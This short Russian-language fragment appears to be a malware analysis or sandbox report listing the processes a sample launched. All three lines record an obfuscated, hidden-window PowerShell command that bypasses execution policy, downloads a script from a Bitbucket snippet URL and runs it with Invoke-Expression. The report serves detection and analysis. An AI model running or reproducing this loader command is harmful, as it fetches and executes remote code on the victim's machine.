Техническая информация
- '<SYSTEM32>\cmd.exe' /c start /min PowerShell -ex Bypass -nOp -w 1 ;i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/mounmeinlylo/g7xBnq/48b9365ec76138129aef695544fdd0a49d85b8f3/files/p000start') -useB); Start-Sl...
- '<SYSTEM32>\cmd.exe' /c start /min PowerShell -ex Bypass -nOp -w 1 ;i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/mounmeinlylo/g7xBnq/48b9365ec76138129aef695544fdd0a49d85b8f3/files/p000start') -useB); Start-Sl...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ex Bypass -nOp -w 1 ;i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/mounmeinlylo/g7xBnq/48b9365ec76138129aef695544fdd0a49d85b8f3/files/p000start') -useB); Start-Sleep -Sec